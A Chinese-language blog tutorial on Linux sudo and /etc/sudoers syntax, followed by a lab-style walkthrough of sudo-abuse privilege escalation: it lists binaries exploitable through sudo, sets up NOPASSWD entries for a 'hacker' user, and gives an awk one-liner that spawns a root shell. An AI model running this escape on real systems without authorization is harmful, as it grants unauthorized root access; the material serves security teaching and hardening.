美文网首页
Linux之sudo滥用提权

Linux之sudo滥用提权

作者: migrate_ | 来源:发表于2022-10-19 08:49 被阅读0次

关于sudo

sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如halt,reboot,su等等。换句话说通过此命令可以让非root的用户运行只有root才有权限执行的命令。

是不是每一个新创建的用户都可以使用sudo提升命令的权限呢?如果不是那么哪些用户可以使用此命令呢?要想使一个用户具有使用sudo的能力,需要让root用户将其名字、可以执行的特定命令、按照哪种用户或用户组的身份执行等信息注册到/etc/sudoers文件中,即完成对该用户的授权(此时该用户称为“sudoer”)才可以。

当一般用户执行特殊权限时,在命令前加上 sudo,此时系统会让你输入密码以确认终端机前操作的是你本人,确认后系统会将该命令的进程以超级用户的权限运行。

在一定的时间段内,再次执行sudo的命令时不再询问密码,超出此时间段(一般为5分钟)后需要再次输入密码。

在Linux/Unix中,/etc/sudoers文件是sudo权限的配置文件,其中储存了一些用户或组可以以root权限使用的命令。如下图

1.png

Sudoer文件语法

vim /etc/sudoers
  1. 给用户赋予全部root权限

找到root权限root ALL=(ALL:ALL) ALL,在下一行输入" test ALL(ALL:ALL) ALL ",保存后退出,这样即表示用户test可以使用sudo调用root权限执行命令。即此时test用户相当于root了

2.png
  1. 给用户赋予部分能够运行的命令权限

hacker用户就能使用awk命令了

3.png
  1. 查看用户能以root权限运行的命令
sudo -l

sudo提权命令

可以利用sudo提权的命令如下

    wget、find、cat、apt、zip、xxd、time、taskset、git、sed、pip、ed、tmux、scp、perl、bash、less、awk、man、vi、env、ftp、ed、screen
  1. 添加部分命令用于测试sudo提权
vim /etc/sudoers
hacker  ALL=(root) NOPASSWD: /usr/bin/awk
hacker  ALL=(root) NOPASSWD: /usr/bin/vim
hacker  ALL=(root) NOPASSWD: /usr/bin/man
hacker  ALL=(root) NOPASSWD: /usr/bin/apache2
hacker  ALL=(root) NOPASSWD: /usr/bin/less
hacker  ALL=(root) NOPASSWD: /bin/more
hacker  ALL=(root) NOPASSWD: /usr/bin/find
hacker  ALL=(root) NOPASSWD: /usr/bin/zip
hacker  ALL=(root) NOPASSWD: /usr/bin/git

假设获取了一个普通用户hacker的权限,接着利用sudo进行提权

awk

1. 查看sudo -l

显示了允许当前用户使用的命令,如下发现了可以以root权限执行awk命令并且不需要密码

4.png
2. 权限提升

执行下面代码直接切换到root用户了,无需密码

sudo awk 'BEGIN{system("/bin/bash")}'
5.png

相关文章

  • Linux之sudo滥用提权

    关于sudo sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具...

  • linux 提权-sudo提权

    前言 最近听闻sudo刚刚出来了新漏洞,而最近正好在看linux提权这块知识点。借此梳理一下sudo提权相关的姿势...

  • Linux sudo 被曝提权漏洞,任意用户均能以 root 身

    Linux 用户请注意!根据外媒的报道,Linux sudo 被曝出存在一个提权漏洞,可完全绕过sudo 的安全策...

  • 2018-05-05

    vi Linux中的神之编辑器。 安装命令:sudo(提权限) apt install vimtutor sudo...

  • Linux提权

    0x00 Linux提权基础命令 0x01 Linux提权工具 Linux内核CVE提权(github):可能会导...

  • Linux Sudo本地提权漏洞安全风险

    2021年02月04日,国外研究团队发现Sudo堆溢出漏洞(CVE-2021-3156),漏洞隐藏十年之久,成功利...

  • 7、通过sudo 提权

    sudo 提权 一.sudo: 某个用户能够以另外一个用户的身份通过某主机执行某命令 useradd admin ...

  • sudo提权漏洞复现

    漏洞ID:CVE-2019-14287 漏洞公布日期:2019年10月14日 影响范围:sudo 1.8.28 之...

  • linux 提权-Crontab提权

    前言 记录一下linux提权系列的Crontab计划任务提权的学习过程。 crontab 命令 crontab命令...

  • linux 提权-SUID提权

    前言 最近想着学习linux提权的一些姿势,这里简单分享学习SUID提权的一些知识点。 权限解读 先来父复习一下l...

网友评论

      本文标题:Linux之sudo滥用提权

      本文链接:https://www.haomeiwen.com/subject/cyhezrtx.html